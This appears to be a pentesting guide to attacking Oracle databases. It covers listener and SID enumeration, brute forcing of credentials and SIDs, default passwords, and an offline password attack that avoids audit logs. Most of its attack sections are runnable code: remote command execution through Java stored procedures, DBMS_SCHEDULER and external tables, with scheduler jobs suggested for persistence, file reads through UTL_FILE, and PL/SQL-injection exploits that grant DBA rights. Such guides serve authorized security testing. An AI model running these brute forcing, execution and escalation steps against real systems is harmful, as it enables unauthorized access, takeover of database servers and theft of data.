ORACLE
ORACLE default uses ports 1521, 1522, 1529
What is ORACLE?
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from here).
When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-).
1
2
3
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
ORACLE Pentesting
 Shodan search query : |
|---|
port:1521,1522,1529 |
Oracle Pentesting requirements installation
Installation of tools (sqlplus) and needed libraries to use the oracle MSF modules
(This installation guide was created for version 12.1.0.1.0, change that name for the version that you download)
As root, create the directory /opt/oracle.. Then download the Oracle Instant Client packages for your version of Kali Linux. The packages you will need are:
- instantclient-basic-linux-12.1.0.1.0.zip
- instantclient-sqlplus-linux-12.1.0.1.0.zip
- instantclient-sdk-linux-12.1.0.1.0.zip
Unzip these under /opt/oracle, and you should now have a path called /opt/oracle/instantclient_12_1/. Next symlink the shared library that we need to access the library from oracle:
1
2
3
4
ln libclntsh.so.12.1 libclntsh.so
ls -lh libclntsh.so
lrwxrwxrwx 1 root root 17 Jun 1 15:41 libclntsh.so -> libclntsh.so.12.1
ldconfig
You also need to configure the appropriate environment variables, add the following to either
~/.bashrc./etc/profile.
1
2
3
4
5
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1
Add Oracle libraries to ldconfig:
1
echo "/opt/oracle/instantclient_12_1/" >> /etc/ld.so.conf.d/99_oracle
If you have succeeded, you should be able to run sqlplus from a command prompt (you may need to log out and log back in again):
1
sqlplus <username>/<password>@<ip_address>/<SID>;
Step Two — Install Ruby Gem ruby-oci8
These steps are needed to use metasploit oracle modules
Install other OS dependencies:
1
apt-get install libgmp-dev
Compile and install ruby-oci8 (root)
1
2
3
4
5
6
wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.1.8.zip
unzip ruby-oci8-2.1.8.zip
cd ruby-oci8-ruby-oci8-2.1.8/
make
make install
gem install ruby-oci8
Restart msfconsole (or restart the machine).
Enumeration
Tools that can be used for this are: nmap, MSF and tnscmd10g.
TNS listener version
1
2
3
4
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>
Other useful TNS listener commands:
| Command | Purpose |
|---|---|
| ping | Ping the listener |
| version | Provide output of the listener version and platform information |
| status | Return the current status and variables used by the listener |
| services | Dump service data |
| debug | Dump debugging information to the listener log |
| reload | Reload the listener configuration file |
| save_config | Write the listener configuration file to a backup location |
| stop | Invoke listener shutdown |
If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected (you can see a list were all the errors are detailed here) — don’t worry… hydra to the rescue:
1
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
The TNS listener could be vulnerable to MitM attacks. Check here how to check if the server is vulnerable and how to perform the attack (all versions up to version 12c are).
SID Enumeration
What is a SID?
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
In some old versions (in 9 it works) you could ask for the SID and the database send it to you:
1
2
3
4
5
6
7
8
9
10
11
tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
If you cant access this way to the SIDs you will need to bruteforce them:
SID Bruteforce
I have merged the nmap and MSF sid lists into this one (without duplicates):
1
2
3
4
5
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Targeting Accounts
Got SID? Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
Metasploit scanner/oracle/oracle_login It has a built-in dictionary for the most popular default values of user account information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
Nmap can also help here with the script oracle-brute. Note that this script mixes the logins and passwords, that is, it tries each login against every password, and it takes quite a while!
Default Passwords
Below are some of the default passwords associated with Oracle:
1
2
3
4
5
6
DBSNMP/DBSNMP - Intelligent Agent uses this to talk to the db server (its some work to change it)
SYS/CHANGE_ON_INSTALL - Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
PCMS_SYS/PCMS_SYS - Default x account
WMSYS/WMSYS - Default x account
OUTLN/OUTLN - Default x account
SCOTT/TIGER - Default x account
Other default passwords can be found here and here.
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to offline brute force.
Remote Stealth Pass Brute Force
Outer Perimeter: Remote stealth pass brute force
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:
- The client connects to the server and sends the user name.
- The server generates a session identifier
AUTH_SESSKEYand encrypts it by usingAES-192. As its key, the system usesSHA-1hash generated from user password and saltAUTH_VFR_DATA. - The server sends an encrypted session ID and salt to the client.
- The client generates the key by hashing its password and received salt. The client uses this key to decrypt the session data received from the server.
- Based on decrypted server session ID, the client generates a new public key for future use.
Now, here’s the most interesting part: The session ID AUTH_SESSKEY sent by the server to the client has a length of 48 bytes. Of these, 40 bytes are random, and the last 8 are the duplicates of 0x08. The initialization vector is 0x00 (Null). Knowing that the last 8 bytes of the public identifier always consist of 0x08, we can bruteforce this password and, moreover, do it in offline mode, which means a tremendous speed, especially if you use GPU. To mount an attack, you need to know SID, valid login (for example, SYS account is very interesting) and, of course, have the ability to connect to the database. In this case, there will be no records, such as Invalid Login Attempt, created in the Oracle audit logs!
Summing it all up:
- Use Wireshark to intercept the initial traffic during authorization. This will be helped by
tnsfilter. - Extract HEX values for
AUTH_SESSKEY,AUTH_VFR_DATA. - Insert them into PoC script, which will perform a dictionary (brute force) attack.
Using nmap and john
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.10.x.x
Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.10.x.x
PORT STATE SERVICE
1521/tcp open oracle
| oracle-brute-stealth:
| Accounts
| SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE863330880E09FAD3B4832CBCFDAC1
| A821D2EA8E3D2209DB6*4202444F49DE9AE72AE2 -
| Hashed valid or invalid credentials
| Statistics
|_ Performed 211 guesses in 9 seconds, average tps: 20
john hashes.txt
User/Pass bruteforce
Different tools offered different user/pass lists for oracle:
1
2
3
4
5
6
7
oscan: /usr/share/oscanner/accounts.default (169 lines)
msf > use admin/oracle/oracle_login # /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv (598 lines)
msf > use scanner/oracle/oracle_login # /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt (568 lines)
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 10.10.x.x
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL 10.10.x.x
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 10.10.x.x
nmap -sT -p 1521 -d -Pn --script-trace --script oracle-brute --script-args "oracle-brute.sid=orcl, brute.credfile=/usr/share/nmap/nselib/data/oracle-default-accounts.lst" 10.10.x.x # /usr/share/nmap/nselib/data/oracle-default-accounts.lst (687 lines)
I have mixed all of them and removed duplicates:
Brute Force
Now, that you know a valid SID and valid credentials. To connect to the database you need the tool: sqlplus
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#nmap fails sometimes for some reson executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
In order to use oracle_login with patator you need to install:
1
pip3 install cx_Oracle --upgrade
Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3)
To login using known credentials:
1
sqlplus <username>/<password>@<ip_address>/<SID>;
If the TNS Listener is on a non-default port (e.g. TCP/1522) :
1
sqlplus <username>/<password>@<ip_address>:<port>/<SID>;
If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:
1
2
3
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
#Example:
sqlplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'
All in One
An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
1
2
#apt install oscanner
oscanner -s <IP> -P <PORT>
Another tool that will do all of this it odat:
1
2
3
4
5
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help #It shouldn't be problems in Kali
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID
With these options (-s and -p), ODAT will search valid SID (System ID) in a first step. You can configure some options for configuring methods (i.e. word-list or brute-force attack). By default, ODAT will use a big word list and it will do a small brute-force attack.
If ODAT founds at least one SID (e.g. ORCL), it will search valid Oracle accounts. It will do that on each SID found. You can specify some options for credentials (e.g. --accounts-file, --accounts-files, --login-as-pwd).
For each valid account (e.g. SYS) on each valid instance (SID), ODAT will return what each Oracle user can do (e.g. reverse shell, read files, become DBA).
Remote Code Execution
There are at least two different ways to execute commands, such as by using Java procedures and DBMS_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: ODAT.
Install ODAT
1
2
3
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali
Execute Code via Java Stored Procedure
1
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
RCE: Java Store Procedure
So, imagine that you have the administrator account information. In this case, a very popular way to execute your command on the server is to write a ‘java stored’ procedure. This is done in three stages. First, create a Java class called ‘oraexec’. To do this, connect via ‘sqlplus’ terminal and write:
1
2
3
4
5
6
7
8
9
10
11
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
public static void execCommand(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
}
/
Next, write a PL/SQL wrapper for this class:
1
create or replace procedure javacmd(p_command varchar2) as language java name 'oraexec.execCommand(java.lang.String)'; /
That’s it. Now, to execute a command, all you need is just to send the following query:
1
exec javacmd('command');
Note that when using the above procedure, we cannot see the results of executed command, however, you can redirect the output to a file and read it. You can find the full code of the shell that allows to read and write files:
However, there is a more sophisticated script that handles the command output, but it has a larger size here.
RCE: Scheduler
The next method, which will help us if there is no Java virtual machine, is to use ‘dbmsscheduler’, the built-in task scheduler of Oracle. To use it, you must have the privilege CREATE EXTERNAL JOB. Here’s a code sample that implements the entry of ‘0wned’ string into a text file in the root of the C: drive:
1
2
exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','c:\ WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2008JOB',program_name => 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
This will create and run a job for executing your command. And here’s an option for calling the Scheduler from another procedure – SYS.KUPP$PROC.CREATE_MASTER_PROCESS, which is of interest to us, primarily, because it allows you to embed multi-statement queries, that is, those consisting of multiple sub-queries. Theoretically, you can run such query even in case of injection into a web application.
1
select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''xxx'',''EXECUTABLE'',''cmd.exe /c echo qqq>>C:/scchh'',0,TRUE); DBMS_SCHEDULER.create_job(job_name=>''jobx'',program_name=>''xxx'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''xxx'');dbms_scheduler.purge_log;') from dual
Note that, when you use the Scheduler, you can run this job more than once and do it with some frequency. As a result, this will help you get a foothold in the tested system, because, even if the administrator deletes the user from OS, this job, which is regularly running in the system, will bring him or her back to life.
RCE: External Tables
As the last method for achieving the execution of OS commands, I would like to mention the use of External Tables. This method will help you later download files from the server. You will need the following privileges:
1
2
3
UTL_FILE;
CREATE TABLE;
a directory reserved for the user.
Let’s remember that the access to UTL_FILE package is by default provided to all accounts with CONNECT role.
Step one: Check the issued directories with the following query:
1
2
3
4
5
6
7
SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
and privilege='EXECUTE' ORDER BY GRANTEE;
TABLE_NAME
------------------------------
ALICE_DIR
Step two: Create an executable batch file with desired command:
1
2
3
4
5
6
7
8
9
declare
f utl_file.file_type;
s varchar2(200) := 'echo KOKOKO >> C:/pwned';
begin
f := utl_file.fopen('ALICE_DIR','test.bat','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
Step three: Prepare the external table EXTT, you will need it to run the file:
1
2
3
4
5
6
7
8
9
CREATE TABLE EXTT (line varchar2(256))
ORGANIZATION EXTERNAL
(TYPE oracle_loader
DEFAULT DIRECTORY ALICE_DIR
ACCESS PARAMETERS
( RECORDS DELIMITED BY NEWLINE
FIELDS TERMINATED BY ',')
LOCATION (alice_dir:'test.bat'))
/
Now, just call your batch file with the following command:
1
SELECT * from EXTT;
The terminal will start to display error messages that the system cannot match the table and invoked file but, in this case, it is not important, as the main objective was to open the executable file, which you have achieved.
ODAT.py utility also can implement this attack. However, it requires the privilege CREATE ANY DIRECTORY, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory.
Read/Write files
Now, let’s proceed to the task of reading and writing the files. If you simply need to read or write a file to the server, you can do it without any Java procedures, which, however, can also handle such tasks. Let’s have a look into UTL_FILE package that has the functionality required for working with the file system. The good news is that, by default, it can be accessed by all users with PUBLIC role. The bad news is that, by default, this procedure has no access to the entire file system, but only to a directory pre-defined by the administrator. However, it is not uncommon to find a directory parameter specified as *, which literally means “access to everything.” You can find this out by using the following command:
1
2
3
select name, value from v$parameter where name = 'utl_file_dir';
With appropriate rights, you can expand the access by using the following query:
alter system set utl_file_dir='*' scope =spfile;
I found that the shortest procedure for using UTL_FILE package is proposed by Alexander Polyakov:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN (''C:/’,'boot.ini','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;
/
If you need more functionality with the ability to write, I recommend to google a script called raptor_oraexec.sql. And according to tradition, here’s an option for using ODAT utility, which, as always, is the shortest:
1
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
UTL_FILE package is also very interesting because if you’re lucky, you can reach the logs, configuration files and obtain passwords from privileged accounts, such as SYS.
The second method that I would like to mention is to use again the External Tables. Remember that, when using External Tables, the database can access in read mode the data from external tables. For a hacker, this means yet another opportunity to download files from the server, but this method requires CREATE ANY DIRECTORY privilege. I suggest immediately using ODAT, as it is stable and fast:
1
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
Elevating Privileges
You can use various methods to elevate privileges, ranging from classic buffer overflows and DLL patching to specialized attacks against databases, such as PL/SQL injections. The topic is very extensive and, in this article, I will not dwell on it, as this is discussed in large research papers, such as those found in the blogs of Lichfield and Finnigan. I will just demonstrate some of them, so that you have a general idea. During the testing, I recommend simply paying attention to current privileges and, based on this, search for desired loopholes in the Internet. Unlike MS SQL, where an attacker can inject xp_cmdshell almost immediately after SELECT by simply closing it with a quotation mark, Oracle DB flatly rejects such tricks. For this reason, we cannot every time resort to classical SQL injections although, in this case, too, it is possible to find a way out. We will consider PL/SQL injections, which are modifying the process of executing a procedure (function, trigger, and other objects) by embedding random commands into available input parameters. (с) Sh2kerr In order to embed the payload, find a function where the input parameters are not filtered. Remember that Oracle SQL does not allow multi-statement (multiple) queries, therefore, most likely, you will need to use some “special” procedures that have this feature. The main idea behind the attack is as follows: By default, unless specified otherwise, the procedure is executed on behalf of the owner and not on behalf of the user who started it. In other words, if a procedure owned by SYS account is available for execution and you can embed your code into it, your payload will also be executed in the context of SYS account. As I already mentioned, this is not what happens always, as there are procedures with ‘authid current_user’ parameter, which means that this procedure will be executed with privileges of the current user. However, usually in each version, you can find some functions that are vulnerable to PL/ SQL injection. A general view of this process is shown right there:
In short, instead of expected legitimate argument, we pass some malicious code that becomes a part of procedure. A good example is provided by CTXSYS.DRILOAD function. It is executed on behalf of CTXSYS and does not filter the input parameter, which allows you to easily rise up to DBA:
1
exec ctxsys.driload.validate_stmt('grant dba to scott');
However, by now, this is probably history, since the vulnerability was found in 2004, and it affects only the old versions 8–9. Usually, the process of escalating the privileges is divided into two parts: writing the procedure that increases the rights and performing the injection itself. A typical procedure is as follows:
1
2
3
4
5
6
7
8
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;RETURN(1);END;
/
Now we can inject a procedure as an argument of vulnerable function (example for versions 10x):
1
exec sys.kupw$WORKER.main('x','YY'' and 1=test1.f1 –-');
In the not too recent versions 10 and 11, there is one nice exception, or rather a vulnerability, that allows you to execute commands on the server without having DBA rights: DBMS_JVM_EXP_PERMS procedure allows a user with CREATE SESSION privilege to get JAVA IO rights. The attack can be mounted as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
SQL> DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
PL/SQL procedure successfully completed.
Now that you have the privileges to call up Java procedures, you can evoke a response from the Windows interpreter and execute something:
1
SQL> select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c echo 123 >c:\\hack’)from dual;
Comments powered by Disqus.